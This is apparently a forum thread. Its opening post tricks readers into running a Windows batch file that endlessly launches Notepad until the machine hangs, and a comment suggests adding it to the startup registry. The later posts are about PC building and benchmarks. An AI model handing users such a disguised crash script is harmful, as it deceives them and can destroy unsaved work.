I have a great idea for everyone...

step 1.
copy and paste this into notepad:
@Echo OFF
:TOP
START %SYSTEMROOT%\SYSTEM32\NOTEPAD.EXE
GOTO TOP

step 2: save the file with a ".bat" extension.
step 3: launch the file.

by the way extra points for whoever can guess what this does.

Elfboy Not exactly <.< it looks like it'll just open infinite instances of notepad until your computer crashes? So in one sense it /is/ a virus, but I think it'll be harmless after it kills your computer once.

but yeah you can just restart your computer and everything will be back to normal.
If you really want to make it annoying you gotta put it in the registry keys as a file that opens on startup.

Elfboy I mostly just guessed based on the syntax >.> I don't know what language this is in, but :TOP and GOTO TOP sounds like a looping mechanism, and START...NOTEPAD.EXE definitely sounds like it will, well... start notepad.exe <.< not sure what the @Echo thing is about, but I gathered the rest. Ah dear though, running that at startup would definitely be... a terrible idea. Let's all not do that.

Just adding this comment in case anyone just skims the comments, would hate for someone to lose their work if they don't realize their computer's going to crash. Thanks for the comment Elf, saved me from trying it.

Onedrive usually autosaves my work so I don't have to, and with musescore I save like every 2 minutes.

but yes I am trying to trick you with a harmless file (although if you have unsaved work maybe not so harmless)

alliyah I've been trying to keep my files on One Drive lately too because RIP it's a bummer when your computer dies with all the files.

So all of the parts of my PC arrived today, I built it, and now it won't connect to my monitor.

So yeah, time to start troubleshooting...
~~I swear of my gpu is broken...~~

I just spent $1k dollars today buying parts to build a custom PC, and I can't wait for them to all arrive so I can build it.

Stellarjay that is amazing!!!!! did you have a hard time finding parts cause of the chip shortage?

Necromancer14 @Stellarjay not really besides the GPU. (GPUs are like double the price right now and most are out of stock due to bitcoin miners buying them all.)
The CPU, motherboard, and all the other parts however were pretty easy to get.

when you go go to the human benchmark website and do the tests, and your results for most tests are in the 30-50th percentile, but then your typing speed result is in the 95th percentile.
